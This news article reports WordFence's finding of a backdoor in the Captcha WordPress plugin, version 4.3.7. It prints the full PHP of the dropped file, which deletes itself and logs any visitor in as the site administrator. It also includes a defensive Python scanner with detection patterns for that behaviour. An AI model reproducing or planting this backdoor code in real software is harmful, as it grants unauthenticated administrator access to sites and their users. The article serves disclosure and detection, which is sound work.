Captcha plugin includes a backdoor that affects 300K WordPress sites

WordFence security researchers found that the Captcha WordPress plugin, installed on roughly 300,000 sites, contains a backdoor that lets an attacker gain administrative access to the WordPress site without any authentication.

Captcha is a CAPTCHA plugin used to protect the WordPress login form and other forms against automated abuse. It was originally developed and maintained by the plugin company BestWebSoft.

On September 5 this year, BestWebSoft announced that ownership of Captcha had been transferred, without saying who the new owner was. About three months later the new owner released version 4.3.7, which contains the malicious code.

The malicious code in 4.3.7 triggers its own update process. It first connects to the domain simplywordpress.net and downloads a plugin update package (a ZIP file) from there rather than from the WordPress.org plugin repository. The package is then automatically unpacked and installed over the Captcha plugin already running on the site.

The ZIP file contains a backdoor file named "plugin-update.php". When requested, it creates a session for user ID 1 (the administrator account created when WordPress is first installed), sets the WordPress authentication cookie for that user, and then deletes itself. Because the file performs no authentication of its own, anyone who requests its URL is logged in as that administrator.

<?php
// Delete the dropper itself so no trace of it stays on disk
@unlink(__FILE__);

// Bootstrap WordPress: the file sits in wp-content/plugins/captcha/, three levels below the site root
require('../../../wp-blog-header.php');
require('../../../wp-includes/pluggable.php');

// User ID 1 is the first administrator account created during installation
$user_info = get_userdata(1);

// Automatic login //
$username = $user_info->user_login;
$user = get_user_by('login', $username );

// Redirect URL //
// Note: get_user_by() returns false rather than WP_Error on failure, so this check never fails
if ( !is_wp_error( $user ) )
{
    // Replace any existing session with an authenticated session for user 1.
    // No password, nonce or capability is checked: any visitor who loads this file is logged in.
    wp_clear_auth_cookie();
    wp_set_current_user ( $user->ID );
    wp_set_auth_cookie ( $user->ID );

    // Send the now-authenticated visitor straight to the admin dashboard
    $redirect_to = user_admin_url();
    wp_safe_redirect( $redirect_to );

    exit();
}
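The two mechanisms described above (a plugin that fetches its "update" from simplywordpress.net, and a dropped plugin-update.php that logs the caller in as user ID 1 and deletes itself) can be checked for across a wp-content/plugins tree. The scanner below is an added example written for this article; it is not WordFence's scanner and not code from the plugin. The detection patterns are heuristics chosen from the behaviour described here, the sample plugin files it writes to a temporary directory are constructed for the demonstration (they are not the real 4.3.7 code), and it assumes the affected plugin's header line "Plugin Name:" begins with "Captcha".

```python
"""Scan a WordPress plugins directory for the indicators described in the article.
Added example, not WordFence's scanner or the plugin's own code."""
import os
import re
import tempfile
from typing import Dict, List

# Indicators taken from the article's description of the backdoor.
BACKDOOR_FILE = "plugin-update.php"
UPDATE_HOST = "simplywordpress.net"
CLEAN_CAPTCHA_VERSION = (4, 4, 5)  # first clean release named in the article

# Heuristic code patterns (assumption): self-deletion, lookup of user ID 1, setting an auth cookie.
CODE_PATTERNS = {
    "self_delete": re.compile(r"@?unlink\s*\(\s*__FILE__\s*\)"),
    "user_id_1": re.compile(r"get_userdata\s*\(\s*1\s*\)"),
    "set_auth_cookie": re.compile(r"wp_set_auth_cookie\s*\("),
}


def parse_plugin_header(text: str) -> Dict[str, str]:
    """Extract 'Plugin Name' and 'Version' from a WordPress plugin header comment."""
    header: Dict[str, str] = {}
    for key in ("Plugin Name", "Version"):
        m = re.search(r"^[\s*#]*" + re.escape(key) + r":\s*(.+?)\s*$", text, re.M)
        if m:
            header[key] = m.group(1)
    return header


def version_tuple(version: str):
    """'4.3.7' -> (4, 3, 7) so versions compare numerically, not as strings."""
    return tuple(int(x) for x in re.findall(r"\d+", version))


def is_affected_captcha_version(version: str) -> bool:
    """Anything older than 4.4.5 is treated as needing replacement, per the article."""
    return version_tuple(version) < CLEAN_CAPTCHA_VERSION


def scan_plugins(plugins_dir: str) -> List[str]:
    """Walk wp-content/plugins and return human-readable findings (empty list = nothing found)."""
    findings: List[str] = []
    for root, _dirs, files in os.walk(plugins_dir):
        for name in sorted(files):
            if not name.endswith(".php"):
                continue
            path = os.path.join(root, name)
            rel = os.path.relpath(path, plugins_dir)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if name == BACKDOOR_FILE:
                findings.append(f"{rel}: file name matches the dropped backdoor")
            if UPDATE_HOST in text:
                findings.append(f"{rel}: references {UPDATE_HOST}")
            hits = [k for k, pat in CODE_PATTERNS.items() if pat.search(text)]
            # Setting an auth cookie alone is legitimate; combined with user-1 lookup or
            # self-deletion it matches the dropper, which keeps false positives down.
            if "set_auth_cookie" in hits and ("user_id_1" in hits or "self_delete" in hits):
                findings.append(f"{rel}: unauthenticated login-as-user-1 pattern ({', '.join(hits)})")
            header = parse_plugin_header(text)
            if header.get("Plugin Name", "").lower().startswith("captcha") and "Version" in header:
                if is_affected_captcha_version(header["Version"]):
                    findings.append(f"{rel}: Captcha {header['Version']} predates clean release 4.4.5")
    return findings


def build_sample_plugins_dir() -> str:
    """Write a constructed plugins tree to a temp dir: one backdoored Captcha, one clean plugin."""
    base = tempfile.mkdtemp(prefix="wp-plugins-")
    os.makedirs(os.path.join(base, "captcha"))
    os.makedirs(os.path.join(base, "clean-plugin"))
    # Constructed stand-in for the backdoored release; the real 4.3.7 code is not reproduced here.
    with open(os.path.join(base, "captcha", "captcha.php"), "w") as fh:
        fh.write("<?php\n/*\nPlugin Name: Captcha\nVersion: 4.3.7\n*/\n"
                 "$update_url = 'https://simplywordpress.net/captcha/update.zip';\n")
    # Constructed stand-in for the dropped file, modelled on the snippet in the article.
    with open(os.path.join(base, "captcha", BACKDOOR_FILE), "w") as fh:
        fh.write("<?php\n@unlink(__FILE__);\n$user_info = get_userdata(1);\n"
                 "wp_set_auth_cookie($user_info->ID);\n")
    # Constructed clean plugin: sets an auth cookie for the current user, which alone is not a hit.
    with open(os.path.join(base, "clean-plugin", "clean-plugin.php"), "w") as fh:
        fh.write("<?php\n/*\nPlugin Name: Clean Plugin\nVersion: 1.0.0\n*/\n"
                 "add_action('init', function () { wp_set_auth_cookie(get_current_user_id()); });\n")
    return base


def demo() -> List[str]:
    """Run the scanner over the constructed tree and return its findings."""
    return scan_plugins(build_sample_plugins_dir())


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Run against a real site with scan_plugins("/var/www/html/wp-content/plugins"). A hit on the file name or the login pattern means the site should be treated as compromised (the backdoor grants administrator access, so rotate credentials and review users), not merely updated; a version hit alone means the plugin should be replaced with 4.4.5 or later.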

WordFence's investigation found that simplywordpress.net was registered to the email address scwellington@hotmail.co.uk under the name "Stacy Wellington". A reverse WHOIS lookup showed that the same registrant holds a large number of other domain names.

Besides Captcha, simplywordpress.net hosts five further plugins for download: Covert Me Popup, Death To Comments, Human Captcha, Smart Recaptcha and Social Exchange.

All five contain the same backdoor installation code as Captcha. A Google search for "site:simplywordpress.net" also shows that the domain offers still more plugins for download.


The WordPress plugin team has since removed the backdoored plugin from the official WordPress plugin repository and published a clean version, Captcha 4.4.5, for affected users. WordFence has also released three firewall rules that block the backdoor installation code in Captcha and in the five other plugins distributed through simplywordpress.net.

WordFence also worked with the WordPress plugin team to get sites still running Captcha versions earlier than 4.4.5 updated to the clean release.

Reference: wordfence